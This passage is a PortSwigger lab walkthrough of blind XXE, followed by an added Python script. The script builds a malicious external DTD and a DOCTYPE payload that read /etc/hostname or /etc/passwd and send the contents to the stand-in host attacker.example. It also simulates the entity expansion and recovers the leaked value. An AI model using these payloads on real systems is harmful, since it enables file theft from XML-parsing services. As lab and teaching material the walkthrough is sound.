Exploitation
What we did so far was just ping back our Burp Collaborator from the remote host, but that on its own doesn't tell us how to go on and exploit this vulnerability.
Every attacker wants to retrieve some sort of interesting information, and with blind XXE this can be achieved out of band. The attack is only possible when the attacker hosts a malicious DTD on a system that they control and then invokes that external DTD from within the in-band XXE payload: the XML specification does not allow parameter entity references inside markup declarations in the internal DTD subset, so the nested declaration trick described below has to live in an external DTD.
The malicious DTD works as follows:
It defines an XML parameter entity called file, which contains the contents of /etc/passwd.
It then defines another XML parameter entity called eval, whose value is a dynamic declaration of a further parameter entity called exfiltrate (the % of that nested declaration is written as &#x25; so that it is not interpreted while eval itself is being declared). The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server, with the value of the file entity placed in the URL query string.
It references the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed.
It references the exfiltrate entity, so that its value is evaluated by requesting the specified URL.
The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own web server. Finally, the attacker must modify the request so that the DOCTYPE of the in-band payload pulls in the hosted DTD, something like this,
So we just managed to exfiltrate the hostname using a malicious external DTD.
When we try to ping back our Burp Collaborator the usual way, it doesn't work, so we'll have to try another way to get the data out.
Luckily, PortSwigger labs provide an exploit server where we can craft and store our own payload, in this case the malicious DTD.
When we store this payload, note the URL of the stored file: that is the address of our malicious DTD.
Now we can exploit it the normal way, referencing that URL from the DOCTYPE of the in-band payload.
When we poll the Collaborator, we notice there is both a DNS and an HTTP interaction. Looking at the HTTP request shows a GET whose query string contains the hostname.
/etc/passwd doesn't work because of the newline characters in the file: some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL, and the file's contents are substituted into that URL verbatim. In that case it may be possible to use ftp:// instead of http://, exfiltrating to a rogue FTP server, which tolerates the newlines. Where that also fails, target a single-line file such as /etc/hostname, which is why the lab uses that file.
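As an added example (not code from the original page, nor PortSwigger's), the following Python builds the malicious DTD and the in-band payload described in the steps above, emulates how a parser with external parameter entities enabled expands them (which also shows why the nested % has to be hidden as &#x25;), checks whether the resulting URL would survive a character-validating URL API, and recovers the leaked value from the request line seen on the attacker's server. It serves both the DTD walkthrough and the newline caveat just above. The attacker host attacker.example, the file contents and the request line are constructed stand-ins; the simulator handles only the declaration shapes it builds itself and is not a real XML parser.

```python
"""Blind XXE out-of-band exfiltration via a malicious external DTD.

Added example, not code from the original page or from PortSwigger.
The attacker host, file contents and request line below are constructed.
"""
import re
from urllib.parse import parse_qs, urlparse

ATTACKER = "http://attacker.example"  # assumption: attacker-controlled web server


def build_malicious_dtd(attacker_url: str, target_file: str) -> str:
    """The DTD hosted on the attacker's server (the four steps from the text)."""
    return (
        # 1. parameter entity 'file' holding the target file's contents
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # 2. 'eval' holds the *declaration* of 'exfiltrate'. Its '%' is written
        #    as &#x25; so the parser does not treat it as a PE reference while
        #    declaring eval; %file; *is* expanded here, so the file lands in the URL.
        f"""<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '{attacker_url}/?x=%file;'>">\n"""
        # 3. referencing eval performs the nested declaration
        "%eval;\n"
        # 4. referencing exfiltrate makes the parser request the URL
        "%exfiltrate;\n"
    )


def build_payload(dtd_url: str, body: str = "<data/>") -> str:
    """In-band XXE payload: the DOCTYPE pulls in and triggers the hosted DTD.
    The document body is a placeholder; a real target needs its expected elements."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>\n'
        f"{body}"
    )


def simulate_expansion(dtd: str, files: dict[str, str]) -> list[str]:
    """Toy model of a parser resolving parameter entities in an external DTD.

    Returns the URLs the parser requests, in order; the last one is the
    out-of-band exfiltration. Only handles the declaration shapes built above.
    """
    internal: dict[str, str] = {}  # name -> replacement text held locally
    external: dict[str, str] = {}  # name -> URL fetched to obtain the text
    requested: list[str] = []

    def resolve(name: str) -> str:
        if name in internal:
            return internal[name]
        url = external[name]
        requested.append(url)
        if url.startswith("file://"):
            return files[url[len("file://"):]]
        return ""  # remote fetch: the request itself leaks the data

    def declare(decl: str) -> None:
        if m := re.fullmatch(r"""<!ENTITY % (\w+) SYSTEM ["'](.*)["']>""", decl, re.DOTALL):
            external[m[1]] = m[2]
        elif m := re.fullmatch(r'<!ENTITY % (\w+) "(.*)">', decl, re.DOTALL):
            # PE references inside an entity value are expanded at declaration
            # time; the character reference &#x25; only becomes '%' afterwards,
            # so the nested declaration survives until %eval; is referenced.
            text = re.sub(r"%(\w+);", lambda r: resolve(r[1]), m[2])
            internal[m[1]] = text.replace("&#x25;", "%")

    for line in dtd.splitlines():
        line = line.strip()
        if m := re.fullmatch(r"%(\w+);", line):
            declare(resolve(m[1]))  # the replacement text is parsed as DTD
        elif line:
            declare(line)
    return requested


def url_survives_validation(url: str) -> bool:
    """Would a URL API that rejects control characters accept this URL?

    Assumption: a single trailing newline (as /etc/hostname usually has) is
    tolerated, since constructors such as java.net.URL trim trailing
    whitespace; an interior CR/LF, as in /etc/passwd, is rejected.
    """
    return re.search(r"[\r\n]", url.rstrip("\r\n")) is None


def recover_value(request_line: str) -> str:
    """Pull the leaked value out of the request line seen on the attacker's
    server or in Burp Collaborator, e.g. 'GET /?x=lab-host-1 HTTP/1.1'."""
    _method, target, _version = request_line.split(" ", 2)
    return parse_qs(urlparse(target).query)["x"][0]


if __name__ == "__main__":
    # constructed stand-ins for the target's files
    FILES = {
        "/etc/hostname": "lab-host-1\n",
        "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    }
    for target in ("/etc/hostname", "/etc/passwd"):
        url = simulate_expansion(build_malicious_dtd(ATTACKER, target), FILES)[-1]
        print(target, "->", repr(url), "accepted" if url_survives_validation(url) else "rejected")
    print(build_payload(f"{ATTACKER}/malicious.dtd"))
    print(recover_value("GET /?x=lab-host-1 HTTP/1.1"))
```

Running the script shows the /etc/hostname request being accepted while the /etc/passwd one is rejected because of the interior newline, which is exactly the behaviour the lab exhibits; swapping the scheme in the eval declaration to ftp:// is the usual next step when a multi-line file is needed.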